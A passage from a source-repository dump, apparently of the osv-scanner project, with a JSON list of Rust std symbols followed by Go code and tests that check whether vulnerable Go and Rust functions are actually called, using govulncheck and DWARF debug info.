"std::io::buffered::linewriter::LineWriter::new": {}, "std::io::buffered::linewriter::LineWriter::with_capacity": {}, "std::io::buffered::linewriter::LineWriter::write_all": {}, "std::io::buffered::linewritershim::LineWriterShim::buffered": {}, "std::io::buffered::linewritershim::LineWriterShim::flush_if_completed_line": {}, "std::io::buffered::linewritershim::LineWriterShim::write_all": {}, "std::io::default_read_exact": {}, "std::io::default_read_to_end": {}, "std::io::error::\u003cimpl core::fmt::Debug for std::io::error::repr_bitpacked::Repr\u003e::fmt": {}, "std::io::error::Custom::fmt": {}, "std::io::error::Error::fmt": {}, "std::io::error::Error::from": {}, "std::io::error::Error::from_raw_os_error": {}, "std::io::error::Error::kind": {}, "std::io::error::Error::last_os_error": {}, "std::io::error::Error::new": {}, "std::io::error::ErrorKind::eq": {}, "std::io::error::ErrorKind::fmt": {}, "std::io::error::repr_bitpacked::Repr::data": {}, "std::io::error::repr_bitpacked::Repr::drop": {}, "std::io::error::repr_bitpacked::Repr::new_custom": {}, "std::io::error::repr_bitpacked::Repr::new_os": {}, "std::io::error::repr_bitpacked::decode_repr": {}, "std::io::error::repr_bitpacked::kind_from_prim": {}, "std::io::impls::\u003cimpl std::io::Read for \u0026[u8]\u003e::read": {}, "std::io::impls::\u003cimpl std::io::Read for \u0026[u8]\u003e::read_buf": {}, "std::io::impls::\u003cimpl std::io::Read for \u0026[u8]\u003e::read_exact": {}, "std::io::impls::\u003cimpl std::io::Read for \u0026mut R\u003e::read": {}, "std::io::impls::\u003cimpl std::io::Read for \u0026mut R\u003e::read_buf": {}, "std::io::impls::\u003cimpl std::io::Read for \u0026mut R\u003e::read_exact": {}, "std::io::impls::\u003cimpl std::io::Write for \u0026mut W\u003e::write_all": {}, "std::io::impls::\u003cimpl std::io::Write for alloc::vec::Vec\u003e::write_all": {}, "std::io::readbuf::BorrowedBuf::filled": {}, "std::io::readbuf::BorrowedCursor::append": {}, "std::io::readbuf::BorrowedCursor::init_ref": {}, "std::io::readbuf::BorrowedCursor::set_init": {}, "std::io::stdio::Stderr::lock": {}, "std::io::stdio::Stderr::write_fmt": {}, "std::io::stdio::StderrLock::write_all": {}, "std::io::stdio::StderrRaw::write_all": {}, "std::io::stdio::Stdout::lock": {}, "std::io::stdio::Stdout::write_fmt": {}, "std::io::stdio::StdoutLock::write_all": {}, "std::io::stdio::StdoutRaw::write": {}, "std::io::stdio::StdoutRaw::write_all": {}, "std::io::stdio::cleanup": {}, "std::io::stdio::cleanup::{{closure}}": {}, "std::io::stdio::eprint": {}, "std::io::stdio::handle_ebadf": {}, "std::io::stdio::print": {}, "std::io::stdio::print_to": {}, "std::io::stdio::stdout": {}, "std::io::stdio::stdout::{{closure}}": {}, "std::os::fd::owned::OwnedFd::drop": {}, "std::panic::BacktraceStyle::as_usize": {}, "std::panic::BacktraceStyle::from_usize": {}, "std::panic::get_backtrace_style": {}, "std::panic::get_backtrace_style::{{closure}}": {}, "std::panic::set_backtrace_style": {}, "std::panicking::begin_panic_handler::PanicPayload::fill": {}, "std::panicking::begin_panic_handler::PanicPayload::fill::{{closure}}": {}, "std::panicking::begin_panic_handler::PanicPayload::get": {}, "std::panicking::begin_panic_handler::PanicPayload::new": {}, "std::panicking::begin_panic_handler::PanicPayload::take_box": {}, "std::panicking::begin_panic_handler::StrPanicPayload::get": {}, "std::panicking::begin_panic_handler::StrPanicPayload::take_box": {}, "std::panicking::begin_panic_handler::{{closure}}": {}, "std::panicking::default_hook": {}, "std::panicking::default_hook::{{closure}}": {}, "std::panicking::panic_count::increase": {}, "std::panicking::panic_count::increase::{{closure}}": {}, "std::panicking::rust_panic_with_hook": {}, "std::path::\u003cimpl core::convert::AsRef\u003cstd::path::Path\u003e for std::ffi::os_str::OsString\u003e::as_ref": {}, "std::path::Component::eq": {}, "std::path::Components::as_path": {}, "std::path::Components::clone": {}, "std::path::Components::eq": {}, "std::path::Components::finished": {}, "std::path::Components::has_root": {}, "std::path::Components::include_cur_dir": {}, "std::path::Components::is_sep_byte": {}, "std::path::Components::len_before_body": {}, "std::path::Components::next": {}, "std::path::Components::next_back": {}, "std::path::Components::parse_next_component": {}, "std::path::Components::parse_next_component::{{closure}}": {}, "std::path::Components::parse_next_component_back": {}, "std::path::Components::parse_next_component_back::{{closure}}": {}, "std::path::Components::parse_single_component": {}, "std::path::Components::prefix_len": {}, "std::path::Components::prefix_remaining": {}, "std::path::Components::prefix_verbatim": {}, "std::path::Components::trim_left": {}, "std::path::Components::trim_right": {}, "std::path::Display::fmt": {}, "std::path::Path::components": {}, "std::path::Path::has_root": {}, "std::path::Path::is_absolute": {}, "std::path::Path::is_dir": {}, "std::path::Path::is_dir::{{closure}}": {}, "std::path::Path::is_file": {}, "std::path::Path::is_file::{{closure}}": {}, "std::path::Path::parent": {}, "std::path::Path::parent::{{closure}}": {}, "std::path::Path::strip_prefix": {}, "std::path::Path::strip_prefix::{{closure}}": {}, "std::path::Path::to_str": {}, "std::path::PathBuf::deref": {}, "std::path::PathBuf::eq": {}, "std::path::PathBuf::from": {}, "std::path::PathBuf::push": {}, "std::path::PathBuf::push::{{closure}}": {}, "std::path::Prefix::clone": {}, "std::path::Prefix::eq": {}, "std::path::Prefix::len": {}, "std::path::PrefixComponent::eq": {}, "std::path::State::clone": {}, "std::path::State::eq": {}, "std::path::State::partial_cmp": {}, "std::path::StripPrefixError::fmt": {}, "std::path::has_physical_root": {}, "std::path::iter_after": {}, "std::personality::dwarf::DwarfReader::read": {}, "std::personality::dwarf::DwarfReader::read_sleb128": {}, "std::personality::dwarf::DwarfReader::read_uleb128": {}, "std::personality::dwarf::eh::find_eh_action": {}, "std::personality::dwarf::eh::read_encoded_pointer": {}, "std::personality::dwarf::eh::round_up": {}, "std::personality::gcc::find_eh_action": {}, "std::personality::gcc::find_eh_action::{{closure}}": {}, "std::personality::gcc::rust_eh_personality_impl": {}, "std::process::abort": {}, "std::rt::cleanup::{{closure}}": {}, "std::rt::lang_start_internal::{{closure}}": {}, "std::sync::once::Once::call_inner": {}, "std::sync::once::Once::call_once::{{closure}}": {}, "std::sync::once::Once::call_once_force": {}, "std::sync::once::Once::call_once_force::{{closure}}": {}, "std::sync::once::Once::is_completed": {}, "std::sync::once::WaiterQueue::drop": {}, "std::sync::once::wait": {}, "std::sync::once_lock::OnceLock::get": {}, "std::sync::once_lock::OnceLock::get_or_init": {}, "std::sync::once_lock::OnceLock::get_or_init::{{closure}}": {}, "std::sync::once_lock::OnceLock::get_or_try_init": {}, "std::sync::once_lock::OnceLock::initialize": {}, "std::sync::once_lock::OnceLock::initialize::{{closure}}": {}, "std::sync::once_lock::OnceLock::is_initialized": {}, "std::sys::common::alloc::realloc_fallback": {}, "std::sys::unix::abort_internal": {}, "std::sys::unix::alloc::\u003cimpl core::alloc::global::GlobalAlloc for std::alloc::System\u003e::alloc": {}, "std::sys::unix::alloc::\u003cimpl core::alloc::global::GlobalAlloc for std::alloc::System\u003e::alloc_zeroed": {}, "std::sys::unix::alloc::\u003cimpl core::alloc::global::GlobalAlloc for std::alloc::System\u003e::dealloc": {}, "std::sys::unix::alloc::\u003cimpl core::alloc::global::GlobalAlloc for std::alloc::System\u003e::realloc": {}, "std::sys::unix::alloc::aligned_malloc": {}, "std::sys::unix::args::imp::ARGV_INIT_ARRAY::init_wrapper": {}, "std::sys::unix::cleanup": {}, "std::sys::unix::cvt": {}, "std::sys::unix::cvt_r": {}, "std::sys::unix::decode_error_kind": {}, "std::sys::unix::fd::FileDesc::write": {}, "std::sys::unix::fs::File::file_attr": {}, "std::sys::unix::fs::File::open": {}, "std::sys::unix::fs::File::open_c": {}, "std::sys::unix::fs::File::open_c::{{closure}}": {}, "std::sys::unix::fs::FileType::is": {}, "std::sys::unix::fs::FileType::is_dir": {}, "std::sys::unix::fs::FileType::is_file": {}, "std::sys::unix::fs::canonicalize": {}, "std::sys::unix::fs::cstr": {}, "std::sys::unix::fs::readlink": {}, "std::sys::unix::fs::stat": {}, "std::sys::unix::fs::try_statx": {}, "std::sys::unix::fs::try_statx::statx": {}, "std::sys::unix::futex::futex_wait": {}, "std::sys::unix::futex::futex_wait::{{closure}}": {}, "std::sys::unix::futex::futex_wake": {}, "std::sys::unix::futex::futex_wake_all": {}, "std::sys::unix::locks::futex_mutex::Mutex::lock": {}, "std::sys::unix::locks::futex_mutex::Mutex::lock_contended": {}, "std::sys::unix::locks::futex_mutex::Mutex::spin": {}, "std::sys::unix::locks::futex_mutex::Mutex::try_lock": {}, "std::sys::unix::locks::futex_mutex::Mutex::unlock": {}, "std::sys::unix::locks::futex_mutex::Mutex::wake": {}, "std::sys::unix::locks::futex_rwlock::RwLock::read": {}, "std::sys::unix::locks::futex_rwlock::RwLock::read_contended": {}, "std::sys::unix::locks::futex_rwlock::RwLock::read_unlock": {}, "std::sys::unix::locks::futex_rwlock::RwLock::spin_read": {}, "std::sys::unix::locks::futex_rwlock::RwLock::spin_read::{{closure}}": {}, "std::sys::unix::locks::futex_rwlock::RwLock::spin_until": {}, "std::sys::unix::locks::futex_rwlock::RwLock::wake_writer": {}, "std::sys::unix::locks::futex_rwlock::RwLock::wake_writer_or_readers": {}, "std::sys::unix::locks::futex_rwlock::has_reached_max_readers": {}, "std::sys::unix::locks::futex_rwlock::is_read_lockable": {}, "std::sys::unix::locks::futex_rwlock::is_unlocked": {}, "std::sys::unix::memchr::memrchr": {}, "std::sys::unix::memchr::memrchr::memrchr_specific": {}, "std::sys::unix::os::current_exe": {}, "std::sys::unix::os::env_read_lock": {}, "std::sys::unix::os::errno": {}, "std::sys::unix::os::error_string": {}, "std::sys::unix::os::getcwd": {}, "std::sys::unix::os::getenv": {}, "std::sys::unix::os::page_size": {}, "std::sys::unix::os_str::Buf::push_slice": {}, "std::sys::unix::os_str::Buf::with_capacity": {}, "std::sys::unix::os_str::Slice::fmt": {}, "std::sys::unix::os_str::Slice::to_owned": {}, "std::sys::unix::os_str::Slice::to_str": {}, "std::sys::unix::path::is_sep_byte": {}, "std::sys::unix::stack_overflow::imp::cleanup": {}, "std::sys::unix::stack_overflow::imp::drop_handler": {}, "std::sys::unix::stack_overflow::imp::signal_handler": {}, "std::sys::unix::stdio::Stderr::write": {}, "std::sys::unix::stdio::Stdout::write": {}, "std::sys::unix::stdio::is_ebadf": {}, "std::sys::unix::thread_local_dtor::register_dtor": {}, "std::sys::unix::thread_local_key::create": {}, "std::sys::unix::thread_local_key::destroy": {}, "std::sys::unix::thread_local_key::get": {}, "std::sys::unix::thread_local_key::set": {}, "std::sys::unix::time::SystemTime::sub_time": {}, "std::sys::unix::time::Timespec::checked_add_duration": {}, "std::sys::unix::time::Timespec::partial_cmp": {}, "std::sys::unix::time::Timespec::sub_timespec": {}, "std::sys::unix::time::Timespec::to_timespec": {}, "std::sys::unix::time::inner::\u003cimpl std::sys::unix::time::SystemTime\u003e::now": {}, "std::sys::unix::time::inner::\u003cimpl std::sys::unix::time::Timespec\u003e::now": {}, "std::sys_common::backtrace::_print::DisplayBacktrace::fmt": {}, "std::sys_common::backtrace::_rust_begin_short_backtrace": {}, "std::sys_common::backtrace::_rust_end_short_backtrace": {}, "std::sys_common::backtrace::lock": {}, "std::sys_common::backtrace::output_filename": {}, "std::sys_common::backtrace::print": {}, "std::sys_common::backtrace::print_fmt": {}, "std::sys_common::backtrace::print_fmt::{{closure}}": {}, "std::sys_common::backtrace::print_fmt::{{closure}}::{{closure}}": {}, "std::sys_common::backtrace::print_fmt::{{closure}}::{{closure}}::{{closure}}": {}, "std::sys_common::memchr::memrchr": {}, "std::sys_common::mutex::MovableMutex::raw_lock": {}, "std::sys_common::mutex::MovableMutex::raw_unlock": {}, "std::sys_common::mutex::MovableMutex::try_lock": {}, "std::sys_common::mutex::StaticMutex::lock": {}, "std::sys_common::mutex::StaticMutexGuard::drop": {}, "std::sys_common::remutex::ReentrantMutex::increment_lock_count": {}, "std::sys_common::remutex::ReentrantMutex::lock": {}, "std::sys_common::remutex::ReentrantMutex::try_lock": {}, "std::sys_common::remutex::ReentrantMutexGuard::drop": {}, "std::sys_common::rwlock::StaticRwLock::read": {}, "std::sys_common::rwlock::StaticRwLockReadGuard::drop": {}, "std::sys_common::thread_info::THREAD_INFO::_getit": {}, "std::sys_common::thread_info::THREAD_INFO::_getit::destroy": {}, "std::sys_common::thread_info::ThreadInfo::with": {}, "std::sys_common::thread_info::ThreadInfo::with::{{closure}}": {}, "std::sys_common::thread_info::ThreadInfo::with::{{closure}}::{{closure}}": {}, "std::sys_common::thread_info::current_thread": {}, "std::sys_common::thread_info::current_thread::{{closure}}": {}, "std::sys_common::thread_info::stack_guard": {}, "std::sys_common::thread_info::stack_guard::{{closure}}": {}, "std::sys_common::thread_local_dtor::register_dtor_fallback": {}, "std::sys_common::thread_local_dtor::register_dtor_fallback::run_dtors": {}, "std::sys_common::thread_local_key::StaticKey::get": {}, "std::sys_common::thread_local_key::StaticKey::key": {}, "std::sys_common::thread_local_key::StaticKey::lazy_init": {}, "std::sys_common::thread_local_key::StaticKey::set": {}, "std::sys_common::thread_parker::futex::Parker::new": {}, "std::sys_common::thread_parker::futex::Parker::park": {}, "std::sys_common::thread_parker::futex::Parker::unpark": {}, "std::thread::Thread::clone": {}, "std::thread::Thread::cname": {}, "std::thread::Thread::name": {}, "std::thread::Thread::new": {}, "std::thread::Thread::unpark": {}, "std::thread::ThreadId::new": {}, "std::thread::ThreadId::new::exhausted": {}, "std::thread::current": {}, "std::thread::local::AccessError::fmt": {}, "std::thread::local::LocalKey::try_with": {}, "std::thread::local::LocalKey::with": {}, "std::thread::local::fast::Key::register_dtor": {}, "std::thread::park": {}, "std::time::SystemTime::duration_since": {}, "std::time::SystemTime::elapsed": {}, "std::time::SystemTime::now": {}, "str::fmt": {}, "test_rust_2::C::test_aabbee": {}, "test_rust_2::main": {}, "test_rust_2::other_item_123": {}, "u16::div": {}, "u16::forward_unchecked": {}, "u16::to_u64": {}, "u16::to_u8": {}, "u32::add": {}, "u32::checked_add": {}, "u32::checked_mul": {}, "u32::div": {}, "u32::shl": {}, "u32::to_u64": {}, "u32::to_u8": {}, "u64::add": {}, "u64::checked_add": {}, "u64::checked_mul": {}, "u64::div": {}, "u64::forward_unchecked": {}, "u64::from_u32": {}, "u64::mul": {}, "u64::to_u64": {}, "u64::to_u8": {}, "u8::bitand": {}, "u8::div": {}, "u8::from_elem": {}, "u8::rem": {}, "u8::to_u64": {}, "usize::add": {}, "usize::add_assign": {}, "usize::backward_unchecked": {}, "usize::div": {}, "usize::forward_unchecked": {}, "usize::from_u64": {}, "usize::from_u8": {}, "usize::get": {}, "usize::get_unchecked": {}, "usize::get_unchecked_mut": {}, "usize::index": {}, "usize::index_mut": {}, "usize::sub": {}, "usize::sum": {}, "usize::sum::{{closure}}": {}, "usize::to_u8": {} } --- ================================================ FILE: internal/sourceanalysis/go.go ================================================ // Package sourceanalysis provides functionality for performing source analysis on code. package sourceanalysis import ( "bytes" "context" "encoding/json" "fmt" "io" "os" "os/exec" "path/filepath" "github.com/google/osv-scanner/v2/internal/cmdlogger" "github.com/google/osv-scanner/v2/internal/sourceanalysis/govulncheck" "github.com/google/osv-scanner/v2/internal/url" "github.com/google/osv-scanner/v2/pkg/models" "github.com/ossf/osv-schema/bindings/go/osvschema" "golang.org/x/vuln/scan" "google.golang.org/protobuf/encoding/protojson" ) func goAnalysis(pkgs []models.PackageVulns, source models.SourceInfo) { // TODO: This will be moved to enrichers which does have context. cmd := exec.CommandContext(context.TODO(), "go", "version") _, err := cmd.Output() if err != nil { cmdlogger.Infof("Skipping call analysis on Go code since Go is not installed.") return } // Set GOVERSION to the Go version in go.mod. var goVersion string for _, pkg := range pkgs { if pkg.Package.Name == "stdlib" { goVersion = pkg.Package.Version break } } vulns, vulnsByID := vulnsFromAllPkgs(pkgs) // Filter out advisories with no symbol information first // This is purely an optimisation step, further filtering is done in matchAnalysisWithPackageVulns function filteredVulns := []*osvschema.Vulnerability{} for _, vuln := range vulns { if vulnHasImportsField(vuln, nil) { filteredVulns = append(filteredVulns, vuln) } } res, err := runGovulncheck(filepath.Dir(source.Path), filteredVulns, goVersion) if err != nil { // TODO: Better method to identify the type of error and give advice specific to the error cmdlogger.Errorf( "Failed to run code analysis (govulncheck) on '%s' because %s\n"+ "(the Go toolchain is required)", source.Path, err.Error(), ) return } matchAnalysisWithPackageVulns(pkgs, res, vulnsByID) } func matchAnalysisWithPackageVulns(pkgs []models.PackageVulns, idToFindings map[string][]*govulncheck.Finding, vulnsByID map[string]*osvschema.Vulnerability) { idToModuleToCalled := map[string]map[string]bool{} for id, findings := range idToFindings { idToModuleToCalled[id] = map[string]bool{} for _, f := range findings { modulePath := f.Trace[0].Module called := f.Trace[0].Function != "" idToModuleToCalled[f.OSV][modulePath] = called } } for _, pv := range pkgs { // Use index to keep reference to original element in slice for groupIdx := range pv.Groups { for _, vulnID := range pv.Groups[groupIdx].IDs { analysis := &pv.Groups[groupIdx].ExperimentalAnalysis if *analysis == nil { *analysis = make(map[string]models.AnalysisInfo) } moduleToCalled, ok := idToModuleToCalled[vulnID] if !ok { // If vulnerability not found, check if it contains any source information fillNotImportedAnalysisInfo(vulnsByID, vulnID, pv, analysis) continue } pkg := pv.Package if !vulnHasImportsField(vulnsByID[vulnID], &pkg) && moduleToCalled[pv.Package.Name] { // Vuln entry does not have any symbol information, therefore called being true is not useful continue } (*analysis)[vulnID] = models.AnalysisInfo{ Called: moduleToCalled[pv.Package.Name], } } } } } func vulnHasImportsField(vuln *osvschema.Vulnerability, pkg *models.PackageInfo) bool { if vuln == nil { return false } for _, affected := range vuln.GetAffected() { if pkg != nil { // TODO: Compare versions to see if this is the correct affected element // ver, err := semantic.Parse(pv.Package.Version, semantic.SemverVersion) if affected.GetPackage().GetName() != pkg.Name { continue } } if affected.GetEcosystemSpecific() == nil { continue } _, hasImportsField := affected.GetEcosystemSpecific().GetFields()["imports"] if hasImportsField { return true } } return false } // fillNotImportedAnalysisInfo checks for any source information in advisories, and sets called to false func fillNotImportedAnalysisInfo(vulnsByID map[string]*osvschema.Vulnerability, vulnID string, pv models.PackageVulns, analysis *map[string]models.AnalysisInfo) { if vulnHasImportsField(vulnsByID[vulnID], &pv.Package) { // If there is source information, then analysis has been performed, and // code does not import the vulnerable package, so definitely not called (*analysis)[vulnID] = models.AnalysisInfo{ Called: false, } } } func runGovulncheck(moddir string, vulns []*osvschema.Vulnerability, goVersion string) (map[string][]*govulncheck.Finding, error) { // Create a temporary directory containing all the vulnerabilities that // are passed in to check against govulncheck. // // This enables OSV scanner to supply the OSV vulnerabilities to run // against govulncheck and manage the database separately from vuln.go.dev. dbdir, err := os.MkdirTemp("", "") if err != nil { return nil, err } defer func() { rerr := os.RemoveAll(dbdir) if err == nil { err = rerr } }() for _, vuln := range vulns { dat, err := protojson.Marshal(vuln) if err != nil { return nil, err } if err := os.WriteFile(fmt.Sprintf("%s/%s.json", dbdir, vuln.GetId()), dat, 0600); err != nil { return nil, err } } // this only errors if the file path is not absolute, // which paths from os.MkdirTemp should always be dbdirURL, _ := url.FromFilePath(dbdir) // Run govulncheck on the module at moddir and vulnerability database that // was just created. cmd := scan.Command(context.Background(), "-db", dbdirURL.String(), "-C", moddir, "-json", "./...") var b bytes.Buffer cmd.Stdout = &b cmd.Env = append(os.Environ(), "GOVERSION=go"+goVersion) if err := cmd.Start(); err != nil { return nil, err } if err := cmd.Wait(); err != nil { return nil, err } // Group the output of govulncheck based on the OSV ID. h := &osvHandler{ idToFindings: map[string][]*govulncheck.Finding{}, } if err := handleJSON(bytes.NewReader(b.Bytes()), h); err != nil { return nil, err } return h.idToFindings, nil } type osvHandler struct { idToFindings map[string][]*govulncheck.Finding } func (h *osvHandler) Finding(f *govulncheck.Finding) { h.idToFindings[f.OSV] = append(h.idToFindings[f.OSV], f) } func handleJSON(from io.Reader, to *osvHandler) error { dec := json.NewDecoder(from) for dec.More() { msg := govulncheck.Message{} // decode the next message in the stream if err := dec.Decode(&msg); err != nil { return err } if msg.Finding != nil { to.Finding(msg.Finding) } } return nil } ================================================ FILE: internal/sourceanalysis/go_test.go ================================================ package sourceanalysis import ( "testing" "github.com/google/osv-scanner/v2/internal/sourceanalysis/govulncheck" "github.com/google/osv-scanner/v2/internal/testutility" "github.com/google/osv-scanner/v2/pkg/models" ) func Test_matchAnalysisWithPackageVulns(t *testing.T) { t.Parallel() pkgs := testutility.LoadJSONFixture[[]models.PackageVulns](t, "testdata/json/input.json") gvcResByVulnID := testutility.LoadJSONFixture[map[string][]*govulncheck.Finding](t, "testdata/json/govulncheckinput.json") vulnsByID := testutility.LoadVulnMapFixture(t, "testdata/json/vulnbyid.json") matchAnalysisWithPackageVulns(pkgs, gvcResByVulnID, vulnsByID) testutility.NewSnapshot().MatchJSON(t, pkgs) } func Test_matchEmptyAnalysisWithPackageVulns(t *testing.T) { t.Parallel() pkgs := testutility.LoadJSONFixture[[]models.PackageVulns](t, "testdata/json/input-no-call-data.json") // When there is no ecosystem specific data, govulncheck will return no results gvcResByVulnID := map[string][]*govulncheck.Finding{} vulnsByID := testutility.LoadVulnMapFixture(t, "testdata/json/vulnbyid-no-call-data.json") matchAnalysisWithPackageVulns(pkgs, gvcResByVulnID, vulnsByID) testutility.NewSnapshot().MatchJSON(t, pkgs) } ================================================ FILE: internal/sourceanalysis/govulncheck/result.go ================================================ // Package govulncheck provides data structures for govulncheck results. // Copied from // https://github.com/golang/vuln/blob/267a472bf377fa105988693c2a597d2b8de36ad8/internal/govulncheck/result.go // and modified. package govulncheck // Message is an entry in the output stream. It will always have exactly one // field filled in. type Message struct { Finding *Finding `json:"finding,omitempty"` // The Config, Progress, and OSV fields from the JSON output are removed, since they // are not used. } // Finding represents a single finding. type Finding struct { // OSV is the id of the detected vulnerability. OSV string `json:"osv,omitempty"` // FixedVersion is the module version where the vulnerability was // fixed. This is empty if a fix is not available. // // If there are multiple fixed versions in the OSV report, this will // be the fixed version in the latest range event for the OSV report. // // For example, if the range events are // {introduced: 0, fixed: 1.0.0} and {introduced: 1.1.0}, the fixed version // will be empty. // // For the stdlib, we will show the fixed version closest to the // Go version that is used. For example, if a fix is available in 1.17.5 and // 1.18.5, and the GOVERSION is 1.17.3, 1.17.5 will be returned as the // fixed version. FixedVersion string `json:"fixed_version,omitempty"` // Trace contains an entry for each frame in the trace. // // Frames are sorted starting from the imported vulnerable symbol // until the entry point. The first frame in Frames should match // Symbol. // // In binary mode, trace will contain a single-frame with no position // information. // // When a package is imported but no vulnerable symbol is called, the trace // will contain a single-frame with no symbol or position information. Trace []*Frame `json:"trace,omitempty"` } // Frame represents an entry in a finding trace. type Frame struct { // Module is the module path of the module containing this symbol. // // Importable packages in the standard library will have the path "stdlib". Module string `json:"module"` // Version is the module version from the build graph. Version string `json:"version,omitempty"` // Package is the import path. Package string `json:"package,omitempty"` // Function is the function name. Function string `json:"function,omitempty"` // Receiver is the receiver type if the called symbol is a method. // // The client can create the final symbol name by // prepending Receiver to FuncName. Receiver string `json:"receiver,omitempty"` // Position describes an arbitrary source position // including the file, line, and column location. // A Position is valid if the line number is > 0. Position *Position `json:"position,omitempty"` } // Position is a copy of token.Position used to marshal/unmarshal // JSON correctly. type Position struct { Filename string `json:"filename,omitempty"` // filename, if any Offset int `json:"offset"` // offset, starting at 0 Line int `json:"line"` // line number, starting at 1 Column int `json:"column"` // column number, starting at 1 (byte count) } ================================================ FILE: internal/sourceanalysis/integration_test.go ================================================ package sourceanalysis import ( "os" "path/filepath" "strings" "testing" "github.com/google/osv-scanner/v2/internal/testutility" "github.com/ossf/osv-schema/bindings/go/osvschema" "google.golang.org/protobuf/encoding/protojson" ) var testdataDir = "testdata/go-integration" func Test_runGovulncheck(t *testing.T) { t.Parallel() entries, err := os.ReadDir(testdataDir) if err != nil { t.Errorf("failed to read testdata dir: %v", err) } vulns := []*osvschema.Vulnerability{} for _, de := range entries { if !de.Type().IsRegular() { continue } if !strings.HasSuffix(de.Name(), ".json") { continue } fn := filepath.Join(testdataDir, de.Name()) file, err := os.Open(fn) if err != nil { t.Errorf("failed to open fixture vuln files: %v", err) } defer file.Close() fileBytes, err := os.ReadFile(fn) if err != nil { t.Errorf("failed to read fixture vuln file (%q): %v", fn, err) } newVuln := &osvschema.Vulnerability{} err = protojson.Unmarshal(fileBytes, newVuln) if err != nil { t.Errorf("failed to decode fixture vuln file (%q): %v", fn, err) } vulns = append(vulns, newVuln) } res, err := runGovulncheck(filepath.Join(testdataDir, "test-project"), vulns, "1.19") if err != nil { t.Errorf("failed to run RunGoVulnCheck: %v", err) } res["GO-2023-1558"][2].Trace[0].Position.Filename = "" res["GO-2023-1558"][2].Trace[1].Position.Filename = "" res["GO-2023-1558"][2].Trace[0].Position.Offset = -1 res["GO-2023-1558"][2].Trace[1].Position.Offset = -1 for _, traceItem := range res["GO-2023-2382"][2].Trace { traceItem.Position.Filename = "" traceItem.Position.Offset = -1 traceItem.Position.Line = -1 // This number differs between go versions if traceItem.Function == "ListenAndServe" && traceItem.Receiver == "*Server" { traceItem.Position.Column = -1 // This number differs between go versions } } testutility.NewSnapshot().MatchJSON(t, res) } ================================================ FILE: internal/sourceanalysis/rust.go ================================================ package sourceanalysis import ( "bytes" "context" "debug/dwarf" "debug/elf" "errors" "fmt" "io" "log" "os" "os/exec" "path/filepath" "strings" "github.com/google/osv-scanner/v2/internal/cachedregexp" "github.com/google/osv-scanner/v2/internal/cmdlogger" "github.com/google/osv-scanner/v2/internal/thirdparty/ar" "github.com/google/osv-scanner/v2/pkg/models" "github.com/ianlancetaylor/demangle" ) const ( // RustFlagsEnv defines the flags that are required for effective source analysis: // - opt-level=3 (Use the highest optimisation level (default with --release)) // - debuginfo=1 (Include DWARF debug info which is extracted to find which funcs are called) // - embed-bitcode=yes (Required to enable LTO) // - lto (Enable full link time optimisation, this allows unused dynamic dispatch calls to be optimised out) // - codegen-units=1 (Build everything in one codegen unit, increases build time but enables more optimisations // and make libraries only generate one object file) RustFlagsEnv = "RUSTFLAGS=-C opt-level=3 -C debuginfo=1 -C embed-bitcode=yes -C lto -C codegen-units=1 -C strip=none" RustLibExtension = ".rcgu.o/" ) func rustAnalysis(pkgs []models.PackageVulns, source models.SourceInfo) { binaryPaths, err := rustBuildSource(source) if err != nil { cmdlogger.Errorf("failed to build cargo/rust project from source: %s", err) return } // This map stores 3 states for each vuln ID // - There is function level vuln info, but it **wasn't** called (false) // - There is function level vuln info, and it **is** called (true) // - There is **no** functional level vuln info, so we don't know whether it is called (doesn't exist) isCalledVulnMap := map[string]bool{} for _, path := range binaryPaths { var readAt io.ReaderAt if strings.HasSuffix(path, ".rlib") { // Is a library, so need an extra step to extract the object binary file before passing to parseDWARFData buf, err := extractRlibArchive(path) if err != nil { cmdlogger.Errorf("failed to analyse '%s': %s", path, err) continue } readAt = bytes.NewReader(buf.Bytes()) } else { f, err := os.Open(path) if err != nil { cmdlogger.Errorf("failed to read binary '%s': %s", path, err) continue } // This is fine to defer til the end of the function as there's // generally single digit number of binaries in a project defer f.Close() readAt = f } calls, err := functionsFromDWARF(readAt) if err != nil { cmdlogger.Errorf("failed to analyse '%s': %s", path, err) continue } for _, pv := range pkgs { for _, v := range pv.Vulnerabilities { for _, a := range v.GetAffected() { // Example of RUSTSEC function level information: // // "affects": { // "os": [], // "functions": [ // "smallvec::SmallVec::grow" // ], // "arch": [] // } ecosystemSpecific := a.GetEcosystemSpecific() if ecosystemSpecific == nil { continue } ecosystemAffectsVal, ok := ecosystemSpecific.GetFields()["affects"] if !ok || ecosystemAffectsVal == nil || ecosystemAffectsVal.GetStructValue() == nil { continue } ecosystemAffects := ecosystemAffectsVal.GetStructValue().AsMap() affectedFunctions, ok := ecosystemAffects["functions"].([]any) if !ok { continue } for _, f := range affectedFunctions { if funcName, ok := f.(string); ok { _, called := calls[funcName] // Once one advisory marks this vuln as called, always mark as called isCalledVulnMap[v.GetId()] = isCalledVulnMap[v.GetId()] || called } } } } } for _, pv := range pkgs { for groupIdx := range pv.Groups { for _, vulnID := range pv.Groups[groupIdx].IDs { analysis := &pv.Groups[groupIdx].ExperimentalAnalysis if *analysis == nil { *analysis = make(map[string]models.AnalysisInfo) } called, hasFuncInfo := isCalledVulnMap[vulnID] if hasFuncInfo { (*analysis)[vulnID] = models.AnalysisInfo{ Called: called, } } } } } } } func functionsFromDWARF(readAt io.ReaderAt) (map[string]struct{}, error) { output := map[string]struct{}{} file, err := elf.NewFile(readAt) if err != nil { return nil, fmt.Errorf("failed to read binary: %w", err) } dwarfData, err := file.DWARF() if err != nil { return nil, fmt.Errorf("failed to extract debug symbols from binary: %w", err) } entryReader := dwarfData.Reader() for { entry, err := entryReader.Next() if errors.Is(err, io.EOF) || entry == nil { // We've reached the end of DWARF entries break } if err != nil { return nil, fmt.Errorf("error parsing binary DWARF data: %w", err) } // We only care about contents in functions if entry.Tag != dwarf.TagSubprogram { continue } // Go through fields for _, field := range entry.Field { // We only care about linkage names (including function names) if field.Attr != dwarf.AttrLinkageName { continue } val, err := demangle.ToString(field.Val.(string), demangle.NoClones) if err != nil { // most likely not a rust function, so just ignore it continue } val = cleanRustFunctionSymbols(val) output[val] = struct{}{} } } return output, nil } // extractRlibArchive return the file path to a temporary ELF Object file extracted from the given rlib. // // It is the callers responsibility to remove the temporary file func extractRlibArchive(rlibPath string) (bytes.Buffer, error) { buf := bytes.Buffer{} rlibFile, err := os.Open(rlibPath) if err != nil { return bytes.Buffer{}, fmt.Errorf("failed to open .rlib file '%s': %w", rlibPath, err) } reader, err := ar.NewReader(rlibFile) if err != nil { return bytes.Buffer{}, fmt.Errorf(".rlib file '%s' is not valid ar archive: %w", rlibPath, err) } for { header, err := reader.Next() if err != nil { log.Fatalf("%v", err) } if 